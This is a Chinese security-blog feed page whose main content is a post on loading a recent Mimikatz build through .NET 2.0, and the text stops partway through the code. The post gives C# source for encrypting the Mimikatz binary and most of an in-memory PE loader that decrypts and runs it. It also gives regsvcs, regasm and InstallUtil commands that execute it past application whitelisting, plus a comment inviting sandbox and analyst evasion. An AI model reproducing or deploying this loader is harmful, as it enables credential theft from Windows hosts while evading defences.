Embed this content in your HTML

Search

Edit this Super RSS.
Account: (login)

More Channels


Channel Catalog


Channel Description:

all things
    0 0

    说 OAuth2.0 漏洞/这个协议不安全的人,把头伸过来下,砖头准备好了。 Black Hat 的有关 Pa […]

    0 0
  • 11/08/16--00:28: 记第10次印刷 (chan 69772724)
  • 《Web前端黑客技术揭秘》这本书2013.1月开售至今,已经第10次印刷,在安全类书籍中,这种成绩确实超出我们 […]

    0 0

    Seebug Paper之前收录了三篇文章有些关联性,分别是: 绕过混合内容警告 – 在安全的页面 […]

    0 0

    当代 Web 的 JSON 劫持技巧 http://paper.seebug.org/130/ 猥琐流的家伙居 […]

    0 0
  • 12/01/16--19:47: [PRE]CSRF攻击-进击的巨人 (chan 69772724)
  • 计划准备出一个PPT专门讲解CSRF里的各种奇技淫巧,除了那些老套的手法之外: https://github. […]

    0 0

    新年新气象,这个蠕虫我做了小范围测试,也提交了官方修复,小圈子里做了分享,这里正式对外公布下,出于研究而非破坏 […]

    0 0
  • 03/05/17--00:37: 蠕虫挖矿一例,无码 (chan 69772724)
  • 今天凌晨,我们的蜜网系统跳出了个有趣的字符串: zaxa2aq@protonmail.com ProtonMa […]

    0 0
  • 05/18/17--19:39: 前端黑在线工具 XSS’OR (chan 69772724)
  • 这是一个在线免费的前端黑工具,目前主要包含 3 大模块: 1. Encode/Decode 加解密模块,包含: […]

    0 0

    XSS’OR 开源了。采用 BSD 开源协议,很宽松,不限制传播与商业化,留下作者版权就好。在下面 […]

    0 0
  • 10/04/17--00:17: WordPress防火墙 (chan 69772724)
  • 用了很久了,推荐下这个: Wordfence Security 细节自己体验吧,说点别的。 WordPress […]

    0 0
  • 12/19/17--06:03: .net2.0 加载最新Mimikatz (chan 69772723)
  • 0x00前言

    之前subtee更新过一个脚本,使用.net2.0来加载mimikatz,别人fork的源码地址在这里,今天看到了新的mimikatz版本更新,所以就顺便看了下这个代码,并尝试用这个代码加载新版本的mimikatz,具体过程如下。

    0x01生成加密字符串

    查看代码,里面存在mimikatz 32级64位的加密字符串,所以我们只需要进行替换即可,为了方便,扣了加密代码出来,如下:

    using System;
    using System.IO;
    using System.Text;
    using System.IO.Compression;
    using System.EnterpriseServices;
    using System.Collections.Generic;
    using System.Configuration.Install;
    using System.Runtime.InteropServices;
    using System.Security.Cryptography;
    
    /*
    Author: Evi1cg, Twitter: @Evi1cg
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  /out:encode.exe  /unsafe encode.cs
    */
    
    namespace test
    {
        class Program
        {
            public class Misc
        {
            //Change This!
            private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };
    
            public static void Stage(string fileName, string Key, string outFile)
            {
    
                byte[] raw = FileToByteArray(fileName);
                byte[] file = Encrypt(raw, Key);
    
                FileStream fileStream = File.Create(outFile);
    
                fileStream.Write(file, 0, file.Length);//Write stream to temp file
    
                Console.WriteLine("File Ready, Now Deliver Payload");
    
            }
    
            public static byte[] FileToByteArray(string _FileName)
            {
                byte[] _Buffer = null;
                System.IO.FileStream _FileStream = new System.IO.FileStream(_FileName, System.IO.FileMode.Open, System.IO.FileAccess.Read);
                System.IO.BinaryReader _BinaryReader = new System.IO.BinaryReader(_FileStream);
                long _TotalBytes = new System.IO.FileInfo(_FileName).Length;
                _Buffer = _BinaryReader.ReadBytes((Int32)_TotalBytes);
                _FileStream.Close();
                _FileStream.Dispose();
                _BinaryReader.Close();
                return _Buffer;
            }
    
            public static byte[] Encrypt(byte[] plain, string password)
            {
                MemoryStream memoryStream;
                CryptoStream cryptoStream;
                Rijndael rijndael = Rijndael.Create();
                Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
                rijndael.Key = pdb.GetBytes(32);
                rijndael.IV = pdb.GetBytes(16);
                memoryStream = new MemoryStream();
                cryptoStream = new CryptoStream(memoryStream, rijndael.CreateEncryptor(), CryptoStreamMode.Write);
                cryptoStream.Write(plain, 0, plain.Length);
                cryptoStream.Close();
                return memoryStream.ToArray();
            }
            public static byte[] Decrypt(byte[] cipher, string password)
            {
                MemoryStream memoryStream;
                CryptoStream cryptoStream;
                Rijndael rijndael = Rijndael.Create();
                Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
                rijndael.Key = pdb.GetBytes(32);
                rijndael.IV = pdb.GetBytes(16);
                memoryStream = new MemoryStream();
                cryptoStream = new CryptoStream(memoryStream, rijndael.CreateDecryptor(), CryptoStreamMode.Write);
                cryptoStream.Write(cipher, 0, cipher.Length);
                cryptoStream.Close();
                return memoryStream.ToArray();
            }
    
            public static byte[] ReadFully(Stream input) //Returns Byte Array From Stream
            {
                byte[] buffer = new byte[16 * 1024];
                using (MemoryStream ms = new MemoryStream())
                {
                    int read;
                    while ((read = input.Read(buffer, 0, buffer.Length)) > 0)
                    {
                        ms.Write(buffer, 0, read);
                    }
                    return ms.ToArray();
                }
            }
    
        }//End Misc Class
            static void Main(string[] args)
            {
                if (args.Length < 3)
                {
                    Console.WriteLine("usage: encode.exe input.exe out.txt password");
                }
                else
                {
                    string fileinput = args[0];
                    string fileoutput = args[1];
                    string password = args[2];
                    byte[] b  = Misc.FileToByteArray(fileinput);
                    byte[] e = Misc.Encrypt(b,password);
                    string f = System.Convert.ToBase64String(e);
                    File.WriteAllText(fileoutput,f);
    
                }
            }
        }
    }
    

    使用csc则可以编译,第一个参数为输入文件路径,第二个参数为输出的文件路径,第三个参数为加密密码。此密码需要与katz2.0.cs中的密码一致,并且脚本中的SALT也需要保持一致,SALT为随机的一组字节,用于使未经授权的消息更难解密。

    加密过程如下:

    1513687959081.png

    0x02修改katz2.0.cs

    修改katz2.0.cs中的mimikatz字符串内容,下面代码最下面的地方~

    using System;
    using System.IO;
    using System.Text;
    using System.IO.Compression;
    using System.EnterpriseServices;
    using System.Collections.Generic;
    using System.Configuration.Install;
    using System.Runtime.InteropServices;
    using System.Security.Cryptography;
    
    
    /*
    Author: Casey Smith, Twitter: @subTee
    License: BSD 3-Clause
    
    Create Your Strong Name Key -> key.snk
    
    $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
    $Content = [System.Convert]::FromBase64String($key)
    Set-Content key.snk -Value $Content -Encoding Byte
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe
    x64
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe katz.exe
    
    [OR]
    C:\Windows\Microsoft.NET\Framework\vv2.0.50727\regasm.exe katz.exe
    //Executes UnRegisterClass If you don't have permissions
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe /U katz.exe
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U katz.exe
    xC:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U katz.exe
    //This calls the UnregisterClass Method
    
    [OR]
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /U katz.exe
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /U katz.exe
    
    
    
    */
    
    
    // Find/Replace All "password"
    // Find "SALT" and update those bytes
    
    namespace Delivery
    {
    
        public class Program
        {
            public static void Main(string[] args)
            {
                if(args.Length == 2) {
                    if(args[0] == "encrypt") {
                        String file = args[1];
    
                        //Example Extract Files and Encrypt.  Ideally you would compress.  But .NET 2 doesn't have really good Compression Libraries..
                        //byte[] b  = Misc.FileToByteArray(@"mimikatz64.exe");
                        byte[] b  = Misc.FileToByteArray(@file);
                        byte[] e = Misc.Encrypt(b,"password");
                        string f = System.Convert.ToBase64String(e);
                        File.WriteAllText(@"file.b64",f);
                        Console.WriteLine("{0}", f);
    
                        /*
                        byte[] b1  = Misc.FileToByteArray(@"mimikatzx86.exe");
                        byte[] e1 = Misc.Encrypt(b1,"password");
                        string f1 = System.Convert.ToBase64String(e1);
                        File.WriteAllText(@"filex86.b64",f1);
                */
    
                    }
                else {
                    //Add any behaviour here to throw off sandbox execution/analysts :)
                    Katz.Exec();
    
                }
    
            }
    
        }
    
    
        [System.ComponentModel.RunInstaller(true)]
        public class Sample : System.Configuration.Install.Installer
        {
            //The Methods can be Uninstall/Install.  Install is transactional, and really unnecessary.
            public override void Uninstall(System.Collections.IDictionary savedState)
            {
    
                //Console.WriteLine("Hello There From Uninstall");
                Katz.Exec();
    
            }
    
        }
    
        public class Bypass : ServicedComponent
        {
            public Bypass() { //Console.WriteLine("I am a basic COM Object"); }
    
            [ComRegisterFunction] //This executes if registration is successful
            public static void RegisterClass(string key)
            {
                Katz.Exec();
            }
    
            [ComUnregisterFunction] //This executes if registration fails
            public static void UnRegisterClass(string key)
            {
                Katz.Exec();
            }
        }
    
    
    
        public class Katz
        {
            //Since .NET 2 doesn't have a method for this, this should do the trick...
            public static IntPtr IntPtrAdd(IntPtr a, int b)
            {
                IntPtr ptr = new IntPtr(a.ToInt64() + b);
                return ptr;
            }
    
            public static void Exec()
            {
    
    
                byte[] latestMimikatz = null;
                try
                {
    
                    //Use Misc Class to encrypt your own files
    
    
    
                    if (IntPtr.Size == 8 )
                    {
                        //x64 Unpack And Execute
                        latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.filex64), "password"); //Yes, this is a bad idea.
    
                    }
                    else if (IntPtr.Size == 4 )
                    {
                        //x86 Unpack And Execute
                        latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.filex86), "password"); //Yes, this is a bad idea.
    
                    }
    
    
    
                }
                catch (Exception ex)
                {
                    while (ex != null)
                    {
                        //Console.WriteLine(ex.Message);
                        ex = ex.InnerException;
                    }
                }
    
                //Console.WriteLine("Downloaded Latest");
                PELoader pe = new PELoader(latestMimikatz);
    
    
    
                IntPtr codebase = IntPtr.Zero;
    
                if (pe.Is32BitHeader)
                {
                    //Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader32.ImageBase.ToString("X4"));
                    codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader32.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                    //Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader32.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
                }
                else
                {
                    //Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader64.ImageBase.ToString("X4"));
                    codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                    //Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader64.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
                }
    
    
    
                //Copy Sections
                for (int i = 0; i < pe.FileHeader.NumberOfSections; i++)
                {
    
                    IntPtr y = NativeDeclarations.VirtualAlloc(IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[i].VirtualAddress), pe.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                    Marshal.Copy(pe.RawBytes, (int)pe.ImageSectionHeaders[i].PointerToRawData, y, (int)pe.ImageSectionHeaders[i].SizeOfRawData);
                    //Console.WriteLine("Section {0}, Copied To {1}", new string(pe.ImageSectionHeaders[i].Name), y.ToString("X4"));
                }
    
                //Perform Base Relocation
                //Calculate Delta
                IntPtr currentbase = codebase;
                long delta;
                if (pe.Is32BitHeader)
                {
    
                    delta = (int)(currentbase.ToInt32() - (int)pe.OptionalHeader32.ImageBase);
                }
                else
                {
    
                    delta = (long)(currentbase.ToInt64() - (long)pe.OptionalHeader64.ImageBase);
                }
    
                //Console.WriteLine("Delta = {0}", delta.ToString("X4"));
    
                //Modify Memory Based On Relocation Table
                IntPtr relocationTable;
                if (pe.Is32BitHeader)
                {
                    relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader32.BaseRelocationTable.VirtualAddress));
                }
                else
                {
                    relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader64.BaseRelocationTable.VirtualAddress));
                }
    
    
                NativeDeclarations.IMAGE_BASE_RELOCATION relocationEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
                relocationEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
    
                int imageSizeOfBaseRelocation = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
                IntPtr nextEntry = relocationTable;
                int sizeofNextBlock = (int)relocationEntry.SizeOfBlock;
                IntPtr offset = relocationTable;
    
                while (true)
                {
    
                    NativeDeclarations.IMAGE_BASE_RELOCATION relocationNextEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
                    IntPtr x = IntPtrAdd(relocationTable, sizeofNextBlock);
                    relocationNextEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(x, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
    
                    IntPtr dest = IntPtrAdd(codebase, (int)relocationEntry.VirtualAdress);
    
                    for (int i = 0; i < (int)((relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2); i++)
                    {
    
                        IntPtr patchAddr;
                        UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i));
    
                        UInt16 type = (UInt16)(value >> 12);
                        UInt16 fixup = (UInt16)(value & 0xfff);
    
                        switch (type)
                        {
                            case 0x0:
                                break;
                            case 0x3:
                                patchAddr = IntPtrAdd(dest, fixup);
                                //Add Delta To Location.
                                int originalx86Addr = Marshal.ReadInt32(patchAddr);
                                Marshal.WriteInt32(patchAddr, originalx86Addr + (int)delta);
                                break;
                            case 0xA:
                                patchAddr = IntPtrAdd(dest, fixup);
                                //Add Delta To Location.
                                long originalAddr = Marshal.ReadInt64(patchAddr);
                                Marshal.WriteInt64(patchAddr, originalAddr + delta);
                                break;
    
                        }
    
                    }
    
                    offset = IntPtrAdd(relocationTable, sizeofNextBlock);
                    sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock;
                    relocationEntry = relocationNextEntry;
    
                    nextEntry = IntPtrAdd(nextEntry, sizeofNextBlock);
    
                    if (relocationNextEntry.SizeOfBlock == 0) break;
    
    
                }
    
    
                //Resolve Imports
    
                IntPtr z;
                IntPtr oa1;
                int oa2;
    
                if (pe.Is32BitHeader)
                {
                    z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
                    oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
                    oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16));
                }
                else
                {
                    z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
                    oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
                    oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16));
                }
    
    
    
                //Get And Display Each DLL To Load
    
                IntPtr threadStart;
                IntPtr hThread;
                if (pe.Is32BitHeader)
                {
                    int j = 0;
                    while (true) //HardCoded Number of DLL's Do this Dynamically.
                    {
                        IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
                        int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16));
                        IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2));
                        IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12))));
                        string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
                        if (DllName == "") { break; }
    
                        IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
                        //Console.WriteLine("Loaded {0}", DllName);
                        int k = 0;
                        while (true)
                        {
                            IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2)));
                            string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2));
                            IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
                            Marshal.WriteInt32(a2, (int)funcAddy);
                            a2 = IntPtrAdd(a2, 4);
                            if (DllFuncName == "") break;
                            k++;
                        }
                        j++;
                    }
                    //Transfer Control To OEP
                    //Console.WriteLine("Executing Mimikatz");
                    threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader32.AddressOfEntryPoint);
                    hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
                    NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
    
                    //Console.WriteLine("Thread Complete");
                }
                else
                {
                    int j = 0;
                    while (true)
                    {
                        IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
                        int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16));
                        IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); //Need just last part?
                        IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12))));
                        string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
                        if (DllName == "") { break; }
    
                        IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
                        //Console.WriteLine("Loaded {0}", DllName);
                        int k = 0;
                        while (true)
                        {
                            IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2)));
                            string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2));
                            ////Console.WriteLine("Function {0}", DllFuncName);
                            IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
                            Marshal.WriteInt64(a2, (long)funcAddy);
                            a2 = IntPtrAdd(a2, 8);
                            if (DllFuncName == "") break;
                            k++;
                        }
                        j++;
                    }
                    //Transfer Control To OEP
                    //Console.WriteLine("Executing Mimikatz");
                    threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader64.AddressOfEntryPoint);
                    hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
                    NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
    
                    //Console.WriteLine("Thread Complete");
                }
    
                //Transfer Control To OEP
    
                //Console.WriteLine("Thread Complete");
                //Console.ReadLine();
    
    
    
    
            } //End Main
    
    
    
        }//End Program
    
        public class PELoader
        {
            public struct IMAGE_DOS_HEADER
            {      // DOS .EXE header
                public UInt16 e_magic;              // Magic number
                public UInt16 e_cblp;               // Bytes on last page of file
                public UInt16 e_cp;                 // Pages in file
                public UInt16 e_crlc;               // Relocations
                public UInt16 e_cparhdr;            // Size of header in paragraphs
                public UInt16 e_minalloc;           // Minimum extra paragraphs needed
                public UInt16 e_maxalloc;           // Maximum extra paragraphs needed
                public UInt16 e_ss;                 // Initial (relative) SS value
                public UInt16 e_sp;                 // Initial SP value
                public UInt16 e_csum;               // Checksum
                public UInt16 e_ip;                 // Initial IP value
                public UInt16 e_cs;                 // Initial (relative) CS value
                public UInt16 e_lfarlc;             // File address of relocation table
                public UInt16 e_ovno;               // Overlay number
                public UInt16 e_res_0;              // Reserved words
                public UInt16 e_res_1;              // Reserved words
                public UInt16 e_res_2;              // Reserved words
                public UInt16 e_res_3;              // Reserved words
                public UInt16 e_oemid;              // OEM identifier (for e_oeminfo)
                public UInt16 e_oeminfo;            // OEM information; e_oemid specific
                public UInt16 e_res2_0;             // Reserved words
                public UInt16 e_res2_1;             // Reserved words
                public UInt16 e_res2_2;             // Reserved words
                public UInt16 e_res2_3;             // Reserved words
                public UInt16 e_res2_4;             // Reserved words
                public UInt16 e_res2_5;             // Reserved words
                public UInt16 e_res2_6;             // Reserved words
                public UInt16 e_res2_7;             // Reserved words
                public UInt16 e_res2_8;             // Reserved words
                public UInt16 e_res2_9;             // Reserved words
                public UInt32 e_lfanew;             // File address of new exe header
            }
    
            [StructLayout(LayoutKind.Sequential)]
            public struct IMAGE_DATA_DIRECTORY
            {
                public UInt32 VirtualAddress;
                public UInt32 Size;
            }
    
            [StructLayout(LayoutKind.Sequential, Pack = 1)]
            public struct IMAGE_OPTIONAL_HEADER32
            {
                public UInt16 Magic;
                public Byte MajorLinkerVersion;
                public Byte MinorLinkerVersion;
                public UInt32 SizeOfCode;
                public UInt32 SizeOfInitializedData;
                public UInt32 SizeOfUninitializedData;
                public UInt32 AddressOfEntryPoint;
                public UInt32 BaseOfCode;
                public UInt32 BaseOfData;
                public UInt32 ImageBase;
                public UInt32 SectionAlignment;
                public UInt32 FileAlignment;
                public UInt16 MajorOperatingSystemVersion;
                public UInt16 MinorOperatingSystemVersion;
                public UInt16 MajorImageVersion;
                public UInt16 MinorImageVersion;
                public UInt16 MajorSubsystemVersion;
                public UInt16 MinorSubsystemVersion;
                public UInt32 Win32VersionValue;
                public UInt32 SizeOfImage;
                public UInt32 SizeOfHeaders;
                public UInt32 CheckSum;
                public UInt16 Subsystem;
                public UInt16 DllCharacteristics;
                public UInt32 SizeOfStackReserve;
                public UInt32 SizeOfStackCommit;
                public UInt32 SizeOfHeapReserve;
                public UInt32 SizeOfHeapCommit;
                public UInt32 LoaderFlags;
                public UInt32 NumberOfRvaAndSizes;
    
                public IMAGE_DATA_DIRECTORY ExportTable;
                public IMAGE_DATA_DIRECTORY ImportTable;
                public IMAGE_DATA_DIRECTORY ResourceTable;
                public IMAGE_DATA_DIRECTORY ExceptionTable;
                public IMAGE_DATA_DIRECTORY CertificateTable;
                public IMAGE_DATA_DIRECTORY BaseRelocationTable;
                public IMAGE_DATA_DIRECTORY Debug;
                public IMAGE_DATA_DIRECTORY Architecture;
                public IMAGE_DATA_DIRECTORY GlobalPtr;
                public IMAGE_DATA_DIRECTORY TLSTable;
                public IMAGE_DATA_DIRECTORY LoadConfigTable;
                public IMAGE_DATA_DIRECTORY BoundImport;
                public IMAGE_DATA_DIRECTORY IAT;
                public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
                public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
                public IMAGE_DATA_DIRECTORY Reserved;
            }
    
            [StructLayout(LayoutKind.Sequential, Pack = 1)]
            public struct IMAGE_OPTIONAL_HEADER64
            {
                public UInt16 Magic;
                public Byte MajorLinkerVersion;
                public Byte MinorLinkerVersion;
                public UInt32 SizeOfCode;
                public UInt32 SizeOfInitializedData;
                public UInt32 SizeOfUninitializedData;
                public UInt32 AddressOfEntryPoint;
                public UInt32 BaseOfCode;
                public UInt64 ImageBase;
                public UInt32 SectionAlignment;
                public UInt32 FileAlignment;
                public UInt16 MajorOperatingSystemVersion;
                public UInt16 MinorOperatingSystemVersion;
                public UInt16 MajorImageVersion;
                public UInt16 MinorImageVersion;
                public UInt16 MajorSubsystemVersion;
                public UInt16 MinorSubsystemVersion;
                public UInt32 Win32VersionValue;
                public UInt32 SizeOfImage;
                public UInt32 SizeOfHeaders;
                public UInt32 CheckSum;
                public UInt16 Subsystem;
                public UInt16 DllCharacteristics;
                public UInt64 SizeOfStackReserve;
                public UInt64 SizeOfStackCommit;
                public UInt64 SizeOfHeapReserve;
                public UInt64 SizeOfHeapCommit;
                public UInt32 LoaderFlags;
                public UInt32 NumberOfRvaAndSizes;
    
                public IMAGE_DATA_DIRECTORY ExportTable;
                public IMAGE_DATA_DIRECTORY ImportTable;
                public IMAGE_DATA_DIRECTORY ResourceTable;
                public IMAGE_DATA_DIRECTORY ExceptionTable;
                public IMAGE_DATA_DIRECTORY CertificateTable;
                public IMAGE_DATA_DIRECTORY BaseRelocationTable;
                public IMAGE_DATA_DIRECTORY Debug;
                public IMAGE_DATA_DIRECTORY Architecture;
                public IMAGE_DATA_DIRECTORY GlobalPtr;
                public IMAGE_DATA_DIRECTORY TLSTable;
                public IMAGE_DATA_DIRECTORY LoadConfigTable;
                public IMAGE_DATA_DIRECTORY BoundImport;
                public IMAGE_DATA_DIRECTORY IAT;
                public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
                public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
                public IMAGE_DATA_DIRECTORY Reserved;
            }
    
            [StructLayout(LayoutKind.Sequential, Pack = 1)]
            public struct IMAGE_FILE_HEADER
            {
                public UInt16 Machine;
                public UInt16 NumberOfSections;
                public UInt32 TimeDateStamp;
                public UInt32 PointerToSymbolTable;
                public UInt32 NumberOfSymbols;
                public UInt16 SizeOfOptionalHeader;
                public UInt16 Characteristics;
            }
    
            [StructLayout(LayoutKind.Explicit)]
            public struct IMAGE_SECTION_HEADER
            {
                [FieldOffset(0)]
                [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
                public char[] Name;
                [FieldOffset(8)]
                public UInt32 VirtualSize;
                [FieldOffset(12)]
                public UInt32 VirtualAddress;
                [FieldOffset(16)]
                public UInt32 SizeOfRawData;
                [FieldOffset(20)]
                public UInt32 PointerToRawData;
                [FieldOffset(24)]
                public UInt32 PointerToRelocations;
                [FieldOffset(28)]
                public UInt32 PointerToLinenumbers;
                [FieldOffset(32)]
                public UInt16 NumberOfRelocations;
                [FieldOffset(34)]
                public UInt16 NumberOfLinenumbers;
                [FieldOffset(36)]
                public DataSectionFlags Characteristics;
    
                public string Section
                {
                    get { return new string(Name); }
                }
            }
    
            [StructLayout(LayoutKind.Sequential)]
            public struct IMAGE_BASE_RELOCATION
            {
                public uint VirtualAdress;
                public uint SizeOfBlock;
            }
    
            [Flags]
            public enum DataSectionFlags : uint
            {
    
                Stub = 0x00000000,
    
            }
    
    
            /// The DOS header
    
            private IMAGE_DOS_HEADER dosHeader;
    
            /// The file header
    
            private IMAGE_FILE_HEADER fileHeader;
    
            /// Optional 32 bit file header
    
            private IMAGE_OPTIONAL_HEADER32 optionalHeader32;
    
            /// Optional 64 bit file header
    
            private IMAGE_OPTIONAL_HEADER64 optionalHeader64;
    
            /// Image Section headers. Number of sections is in the file header.
    
            private IMAGE_SECTION_HEADER[] imageSectionHeaders;
    
            private byte[] rawbytes;
    
    
    
            public PELoader(string filePath)
            {
                // Read in the DLL or EXE and get the timestamp
                using (FileStream stream = new FileStream(filePath, System.IO.FileMode.Open, System.IO.FileAccess.Read))
                {
                    BinaryReader reader = new BinaryReader(stream);
                    dosHeader = FromBinaryReader<IMAGE_DOS_HEADER>(reader);
    
                    // Add 4 bytes to the offset
                    stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin);
    
                    UInt32 ntHeadersSignature = reader.ReadUInt32();
                    fileHeader = FromBinaryReader<IMAGE_FILE_HEADER>(reader);
                    if (this.Is32BitHeader)
                    {
                        optionalHeader32 = FromBinaryReader<IMAGE_OPTIONAL_HEADER32>(reader);
                    }
                    else
                    {
                        optionalHeader64 = FromBinaryReader<IMAGE_OPTIONAL_HEADER64>(reader);
                    }
    
                    imageSectionHeaders = new IMAGE_SECTION_HEADER[fileHeader.NumberOfSections];
                    for (int headerNo = 0; headerNo < imageSectionHeaders.Length; ++headerNo)
                    {
                        imageSectionHeaders[headerNo] = FromBinaryReader<IMAGE_SECTION_HEADER>(reader);
                    }
    
    
    
                    rawbytes = System.IO.File.ReadAllBytes(filePath);
    
                }
            }
    
            public PELoader(byte[] fileBytes)
            {
                // Read in the DLL or EXE and get the timestamp
                using (MemoryStream stream = new MemoryStream(fileBytes, 0, fileBytes.Length))
                {
                    BinaryReader reader = new BinaryReader(stream);
                    dosHeader = FromBinaryReader<IMAGE_DOS_HEADER>(reader);
    
                    // Add 4 bytes to the offset
                    stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin);
    
                    UInt32 ntHeadersSignature = reader.ReadUInt32();
                    fileHeader = FromBinaryReader<IMAGE_FILE_HEADER>(reader);
                    if (this.Is32BitHeader)
                    {
                        optionalHeader32 = FromBinaryReader<IMAGE_OPTIONAL_HEADER32>(reader);
                    }
                    else
                    {
